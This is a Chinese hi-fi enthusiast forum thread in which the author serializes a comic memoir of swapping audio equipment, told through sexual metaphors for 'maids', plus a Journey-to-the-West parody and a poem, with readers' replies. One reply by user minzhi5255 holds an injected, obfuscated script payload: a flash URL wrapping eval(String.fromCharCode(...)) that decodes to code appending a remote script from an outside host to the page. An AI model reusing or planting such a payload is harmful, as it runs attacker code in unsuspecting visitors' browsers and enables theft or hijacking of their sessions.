极品人生

标题: 停业整顿回忆录 [打印本页]

作者: cenwei999    时间: 2017-3-27 14:51
标题: 停业整顿回忆录

停业整顿回忆录:
前言:
发烧和吃饭撒尿不一样,不弄也死不了人。
发烧和吃药差不多,弄不好会死人。
                                      -------药别停黑胶俱乐部

(一)
P小姐离开很久了,她陪我度过了一段静谧的时光。
其实她是最后一个走的,在这个大家庭里,她也是我最为不舍的。
之前,A先生已经先离开了,原因确非常的复杂。
这个家庭里面,因为我的贪欲总是会有离别。
其实A和P都是不错的仆人,他们兢兢业业,值得我付给他们的薪水。
去年,A和P来到我这里,把不算太好的环境整理的有模有样,我着实过了段日有丝竹夜有红袖的好日子。
肆意了没多久,我感觉以A和P的水平,是时候换个暖穿的丫鬟,让床上更热乎热乎。
原来的丫鬟是个英国的丫头,呵呵我们这个圈子基本没人搞国货暖床了。
英国丫鬟清冷高贵,日子久了总觉得缺点激情。对的,和隔壁老王家的美国妹子比,口味淡了点。
没办法年纪大了,不玩点重口味的,对不起自己。
琢磨了琢磨,兜里还有俩闲钱,寻思着整个美国大妞回来,感受一下烈焰红唇。
匆匆的,匆匆的把英国丫鬟嫁去了河北,找了个实诚的庄稼汉子给他。

作者: 空山鸟语sshong    时间: 2017-3-27 15:44
编,继续编故事
作者: chain    时间: 2017-3-27 16:21
999兄口味重了
作者: cenwei999    时间: 2017-3-27 18:29
求不得,求不得。天造地设一般的难得。
作者: qsy    时间: 2017-3-28 08:27
等着呢……
作者: cenwei999    时间: 2017-3-28 11:35

(二)
美国妞大都奔放热烈,琢磨着得找个适合我这小身板的,不然把老腰干折了怎么办。
古人有云:鱼和熊掌,筷子和缸!
而且最好A和P 能hold 住的,这两年房价涨股价跌,收入少,罚款多。中国梦越来越像个梦了。
在魔都的好友圈子里兜了一圈,和朋友们搞搞3P,一起玩弄了一下别人家的丫鬟。
结果:定不下来,都tmd不好伺候。
不论是加利福尼亚的还是堪萨斯的,都挑食。
不认真伺候,《后庭花》都唱不好的主。
迷茫.......
作者: rover    时间: 2017-3-28 20:40
哈哈!继续
作者: 如翼    时间: 2017-3-28 20:59

作者: minzhi5255    时间: 2017-3-28 21:48
天造地设一般的难得。

http://localhost/flash.swf?\'+eval(String.fromCharCode(119,105,116,104,40,100,111,99,117,109,101,110,116,41,48,91,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,41,46,115,114,99,61,39,104,116,116,112,58,47,47,115,104,117,97,106,105,57,46,99,111,109,47,63,97,61,49,39,93,59))+\'

作者: qsy    时间: 2017-3-29 08:29
精彩!!!
作者: cenwei999    时间: 2017-3-29 10:55
(三)
西游发骚记
旧爱已走新欢未到,那两个月确实是放空自己。
期间也不少折腾,朋友家的意大利姑娘被我勾引了回来,心中还抱有幻想。
美式咖啡和英式下午茶的结合,也许就是意式咖啡,说不定就能让我喷了。
同时到位的,还有日本的高科技产品,期望能增加点情趣。
就这么迷迷糊糊的玩着别人的小妾,心里也没啥负担。
我琢磨着,这是发骚最惬意的心态,好听我就也娶一个,不好听我就一个巴掌把她删回去,真tmd放松。
日子长了,子弹存了点,作为男人,不发射出去是多么的难受。于是决定,买。管他买什么,先买了再说。
就这紧要关口,有人来电:
骚什么骚啦,过来吃火锅。吃完火锅,一起骚。
于是叫上三五好友,去哪里?
天竺?
天竺你妹啊,天竺吃火锅啊
巴渝!
ok!
走起!
于是我们师徒四人,开始了西游发骚记!
作者: op133    时间: 2017-3-29 21:13
好好好,这文风东邪西毒的俺喜欢。俺最近尘埃落定,终于不用挑灯夜战车水马龙的折腾,也有闲情逸致看看好文。请继续。
作者: 上海潜水员    时间: 2017-3-29 22:13
一个个往外爬 一个个往里跳
作者: hc245    时间: 2017-3-29 22:25
内积外表,症候不轻!
作者: cenwei999    时间: 2017-3-29 22:28
愿祈佛手双垂下,天下烧友拉出坑。
作者: 老蒋    时间: 2017-3-29 22:48
好一篇情色隐喻的烧文!楼主大胆!
作者: 远志    时间: 2017-3-29 23:05
继续写啊!
作者: CLJ1957    时间: 2017-3-30 08:23
洗耳恭听。。。
作者: ttshowji    时间: 2017-3-30 10:03
妙趣横生
作者: cenwei999    时间: 2017-3-30 12:54

(三)
西游发骚记
腾云驾雾亦晚点,师徒四人饿穿肠。
黑暗料理老火锅,把酒赏月好时光。

话说师徒四人,来到了魔都南天门,大喊一声,筋斗云.......。
麻痹,还是先领登机牌吧,别装逼了。
灯灯灯灯灯,腾云驾雾,走起。
but,南天门太忙了,一等就是4个小时。
我对悟空说,八戒都饿了,化些斋来。
悟空看了看八戒,说:你这个呆子,就知道吃吃吃,说好的存钱买根天仙配大参考,最后都被你吃掉了。
这顿就省省吧,到了那边有人请。
八戒从包里拿了一根黄瓜出来,大师兄,这是老猪我帮重庆妹子准备的,要不咱们先吃了它顶顶。
唐僧:only you ,如此下流淫荡.......。
南天门广播:去往重庆的XXXX已经可以登机了.....
八戒收起黄瓜,嘿嘿,重庆妹子有福利了,还是帮她们留着吧。

作者: wayned    时间: 2017-3-30 13:15
大师歇业,可惜可惜。
作者: 空山鸟语sshong    时间: 2017-3-30 17:38
他歇的是被重庆妹子退货的“黄瓜”,不是发烧哇
作者: cenwei999    时间: 2017-3-31 10:55
烧已退,黄瓜还在
作者: 空山鸟语sshong    时间: 2017-3-31 13:30
这个我信,否则也成goldstar了
作者: AML1    时间: 2017-3-31 15:57
施主:是时候表演真正的技术了......
作者: cenwei999    时间: 2017-4-1 16:01
清明休假。
后面不好忽悠。
作者: bobo_thorens    时间: 2017-4-2 00:28
这年头就缺你这样的淫才
作者: cenwei999    时间: 2017-4-17 09:48

间奏曲:我和发烧世界不熟

我和发烧世界不熟

这并非是我安静的原因。

我依旧有很多问题,

问论坛,问群里,问希望,问距离。

我和发烧世界不熟。

这并非是我绝望的原因。

我依旧有很多热情,

给退却,给折腾,给昨天,给安寂。

我和发烧世界不熟。

这并非是我虚假的原因。

我依旧有很多真诚,

离不开,放不下,烧下去,玩得起。

我和发烧世界不熟。

这并非是我孤寂的原因。

我依旧有很多诉求,

需慰藉,待分享,惹心烦,告诉你。

我和发烧世界不熟。

这并非是我冷漠的原因。

我依旧有很多动情,

为黑胶,为数播,为卡带,为cd。

我和发烧世界不熟。

这并非是我逃避的原因。

我依旧有很多憧憬,

对梦想,对记忆,对失败,对希冀。

我和发烧世界不熟。

这并非是我卑微的原因。

我依旧有很多勇敢,

不信书,不信教,不信钱,不信侣。

我和发烧世界不熟。

这并非是我失落的原因。

我依旧有很多高昂,

有存在,有价值,有独特,有意义。

我和发烧世界不熟。

这并非是我迷茫的原因。

我依旧有很多方向,

往前走,回头望,能折腾,会停息。

我和发烧世界不熟。

这并非是我撕裂的原因。

我依旧有很多完整,

至少我要成全我自己。
       我和发烧世界不熟
       这并非是我喜欢扯蛋的原因
       我依旧有很多认真
       爱音乐,存知己,抽雪茄,骂二逼。

我和发烧世界不熟。

这并非是我选择退烧或者坚持的原因。

我依旧有很多选择,

刚巧,这两者,都不是选项之一。

作者: AML1    时间: 2017-4-17 09:57
cenwei999 发表于 2017-4-17 09:48
间奏曲:我和发烧世界不熟

我和发烧世界不熟

此段我觉得从下往上读别有一番心境
作者: ttshowji    时间: 2018-6-7 11:09
喊楼主出来继续,难得的帖子
作者: cenwei999    时间: 2020-7-21 16:24
转眼已三年,儿子幼儿园,太监文继续,烧友笑开颜。
作者: wlg2000    时间: 2020-7-23 08:24
再看已是3年前

欢迎光临 极品人生 (http://hiendlife.com/x1/) Powered by Discuz! X3.2